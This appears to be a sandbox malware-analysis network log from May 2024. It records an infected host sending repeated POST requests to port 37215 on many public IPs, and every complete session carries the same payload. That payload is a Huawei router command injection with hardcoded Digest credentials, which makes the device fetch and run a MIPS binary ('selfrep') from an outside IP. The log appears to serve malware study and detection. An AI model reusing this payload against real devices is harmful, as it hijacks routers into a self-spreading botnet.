                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2387192.168.2.1343694157.97.24.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.793885946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2388192.168.2.1337618197.68.108.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.793908119 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2389192.168.2.1343548121.11.182.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.794353008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2390192.168.2.1346734197.244.120.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.794372082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2391192.168.2.135652641.241.215.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.794398069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2392192.168.2.134464641.11.53.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.794409037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2393192.168.2.1353304197.206.79.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.794544935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2394192.168.2.1340252197.215.250.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.794564009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2395192.168.2.1354212157.123.201.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.794965029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2396192.168.2.133291491.78.75.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.794985056 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 